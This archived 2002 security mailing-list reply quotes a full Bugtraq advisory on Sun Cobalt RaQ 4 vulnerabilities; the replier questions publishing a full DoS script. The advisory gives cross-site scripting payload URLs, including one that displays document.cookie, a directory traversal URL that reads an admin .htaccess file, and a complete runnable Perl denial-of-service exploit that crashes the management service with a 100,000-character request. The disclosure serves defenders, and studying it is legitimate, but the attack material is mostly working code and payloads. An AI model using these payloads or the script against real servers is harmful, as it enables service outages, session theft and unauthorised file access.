[Date Prev][Date Next][Thread Prev][Thread Next][Date Index][Thread Index]

Re: [cobalt-security] FWD: Colbalt-RAQ-v4-Bugs&Vulnerabilities

Subject: Re: [cobalt-security] FWD: Colbalt-RAQ-v4-Bugs&Vulnerabilities
From: "Jelmer Jellema" <cobalt@xxxxxxxxxxxxxxx>
Date: Fri, 1 Mar 2002 12:36:44 +0100
Organization: Spin in het Web (www.spininhetweb.nl)
List-id: Mailing list for users to address network security on Cobalt products. <cobalt-security.list.cobalt.com>

Who are those guys, publishing a full dos script?

Jelmer
----- Original Message -----
From: <cobalt@xxxxxxxxxxxxx>
To: <cobalt-security@xxxxxxxxxxxxxxx>
Sent: Friday, March 01, 2002 11:23 AM
Subject: [cobalt-security] FWD: Colbalt-RAQ-v4-Bugs&Vulnerabilities


> This appeared in Bugtraq yesterday:
>
> --------------------------------------------------------------------
> From: Alex Hernandez <al3xhernandez@xxxxxxxxxx>
> To: bugtraq@xxxxxxxxxxxxxxxxx
> Subject: Colbalt-RAQ-v4-Bugs&Vulnerabilities
> Date sent: Thu, 28 Feb 2002 09:33:17 -0500
> Send reply to: <al3xhernandez@xxxxxxxxxx>
>
>
> ------oOo----------------
> Cobalt RAQ 4 Server Management,
> Cross Site Scripting , Directory Traversal & DoS Vulnerabilities.
> ------oOo----------------
>
>
> Company Affected: www.cobalt.com & www.sun.com
> Version: RAQ 4 Server Management.
> Dowload: http://www.cobalt.com/products/raq/index.html
> OS Affected: Linux ALL, Solaris ALL.
>
>
> Author:
>
> ** Alex Hernandez <al3xhernandez@xxxxxxxxxx>
> ** Thanks all the people from Spain and Argentina.
> ** Special Greets: White-B, Pablo S0r, Paco Spain, G.Maggiotti.
>
>
> ----=[Brief Description]=------------
>
> The Sun Cobalt RaQ is a server appliance for Internet Service Providers
> (ISPs). It can host up to 200 individual websites or it can be dedicated
> to a single medium or large customer. This versatility opens up tremendous
> opportunity for service provider to invest in a single piece of hardware
> while migrating business customers up to dedicated servers.
>
>
> ----=[Summary]=----------------------
>
>
> Exist three vulnerabilities:
>
> a) Cross Site Scripting.
> b) Traversal vulnerabilities.
> c) Denial Of Service.(Exploit Released)
>
>
> Cobalt's service.cgi incorrectly handles the incoming search parses,
> incoming HTML tags or JavaScript will be included inside the result
> without them being filtered out for dangerous content. A similar problem
> occurs with the x.cgi's inclusion of malicious code inside the resulting
> title search.
>
> The cgi^s files is an open source .A security vulnerability in the
> product allows attackers to insert malicious content into existing web
> pages by exploiting the Cross-Site Scripting Vulnerability.
>
>
> Affected Files Cgi^s
>
> alert.cgi
> service.cgi
>
>
> Workaround:
> 1) Delete service.cgi from the system, or disable its possible
> execution.
> 2) Delete alert.cgi from the system, or disable its possible execution
>
>
> EXAMPLES:
>
> http://10.0.0.1:81/cgi-bin/.cobalt/alert/service.cgi?service=<h1>Hello!</h
> 1><script>alert('hello')</script>
> http://10.0.0.1:81/cgi-bin/.cobalt/alert/service.cgi?service=<script>alert
> ('Microsoft%20hole')</script>
> http://10.0.0.1:81/cgi-bin/.cobalt/alert/service.cgi?service=<img%20src=ja
> vascript:alert(document.domain)>
> http://10.0.0.1:81/cgi-bin/.cobalt/alert/service.cgi?service=<script>alert
> (document.cookie)</script>
>
> LOCATION:
> http://10.0.0.1:81/cgi-bin/.cobalt/alert/service.cgi?service=%3Cscript%3Ea
> lert(document.location)%3C/script%3E
>
> COOKIES:
> http://10.0.0.1:81/cgi-bin/.cobalt/alert/service.cgi?service=%3Cscript%3Ea
> lert(document.cookie)%3C/script%3E
>
> TAG IMAGES:
> http://10.0.0.1:81/cgi-bin/.cobalt/alert/service.cgi?service=<img%20src=ja
> vascript:alert(document.domain)>
>
>
> WRITE ON DOCUMENT:
> http://10.0.0.1:81/cgi-bin/.cobalt/alert/service.cgi?service=<SCRIPT>docum
> ent.write(document.domain)</SCRIPT>
>
>
> ------oOo--------
>
> Traversal File configuration.
>
>
> Exploit:
> http://10.0.0.1:81/.cobalt/sysManage/../admin/.htaccess
>
> # Access file for /usr/admserv/html/.cobalt/admin/ (admin  )
> order allow,deny
> allow from all
> require user admin
> Authname CobaltRaQ
> Authtype Basic
>
>
>
> Directory by Default on server is: "/usr/admserv/html/.cobalt/admin" u can
> translate to any directory for capture restricted files or passwords and
> profiles the users.
>
>
> ------oOo--------
>
> Denial Of service.
>
>
> Proof Of concept:
>
> Server crashes after sending a very long URL:
>
> Example:
>
> http://10.0.0.1:81/cgi-bin/.cobalt/alert/service.cgi?service=/AAAAAAAAA...
> (Ax100000)...AAA
>
>
> Crash system and the admin need restart the service!.
>
>
> ------oOo-------------
> Exploit Code DoS Cobalt4_DoS.pl
> ------oOo-------------
>
>
> #!/usr/bin/perl
> #
> # Simple script to send a long 'A^s' command to the server,
> # resulting in the server crashing.
> #
> # Cobalt RAQ DoS v4 proof-of-concept exploit.
> # By Alex Hernandez <al3xhernandez@xxxxxxxxxx> (C)2002.
> #
> # Thanks all the people from Spain and Argentina.
> # Special Greets: White-B, Pablo S0r, Paco Spain, G.Maggiotti.
> #
> #
> # Usage: perl -x Cobalt4_DoS.pl -s <server>
> #
> # Example:
> #
> # perl -x Cobalt4_DoS.pl -s 10.0.0.1
> #
> # Crash was successful !
> #
>
> use Getopt::Std;
> use IO::Socket;
>
> print("\nCobalt RAQ DoS v4.0 DoS exploit (c)2002.\n");
> print("Alex Hernandez al3xhernandez\@ureach.com\n\n");
>
> getopts('s:', \%args);
> if(!defined($args{s})){&usage;}
>
> ($serv,$port,$def,$num,$data,$buf,$in_addr,$paddr,$proto);
>
> $def = "A";
> $num = "100000";
> $data .= $def x $num;
> $serv = $args{s};
> $port = 81;#maybe u define the port for diference of versions
> $buf = "GET /cgi-bin/.cobalt/alert/service.cgi?service=$data
> /HTTP/1.0\r\n\r\n";
>
>
> $in_addr = (gethostbyname($serv))[4] || die("Error: $!\n");
> $paddr = sockaddr_in($port, $in_addr) || die ("Error: $!\n");
> $proto = getprotobyname('tcp') || die("Error: $!\n");
>
> socket(S, PF_INET, SOCK_STREAM, $proto) || die("Error: $!");
> connect(S, $paddr) ||die ("Error: $!");
> select(S); $| = 1; select(STDOUT);
> print S "$buf";
>
>
> print("\nCrash was successful !\n\n");
>
> sub usage {die("\n\nUsage: perl -x $0 -s <server>\n\n");}
>
>
>
> ------oOo------------------------------------
> Vendor Response:
> The vendor was notified
>
> Posted List^s Security cobalt:
> cobalt-security@xxxxxxxxxxxxxxx &
> jlovell@xxxxxxx
>
> http://www.cobalt.com
> Patch Temporary:
> Delete files cgi^s from the system, or disable its
> possible execution.
>
> Alex Hernandez <al3xhernandez@xxxxxxxxxx> (c) 2002.
>
> ------oOo------------------------------------
>
>
>
>
> _______________________________________________
> cobalt-security mailing list
> cobalt-security@xxxxxxxxxxxxxxx
> http://list.cobalt.com/mailman/listinfo/cobalt-security
>

References:
- [cobalt-security] FWD: Colbalt-RAQ-v4-Bugs&Vulnerabilities
  - From: cobalt

Prev by Date: [cobalt-security] FWD: Colbalt-RAQ-v4-Bugs&Vulnerabilities
Next by Date: Re: [cobalt-security] FWD: Colbalt-RAQ-v4-Bugs&Vulnerabilities *** crap ***
Previous by thread: [cobalt-security] FWD: Colbalt-RAQ-v4-Bugs&Vulnerabilities
Next by thread: Re: [cobalt-security] FWD: Colbalt-RAQ-v4-Bugs&Vulnerabilities *** crap ***

Sun Cobalt Security Message Index

Sun Cobalt Security Thread Index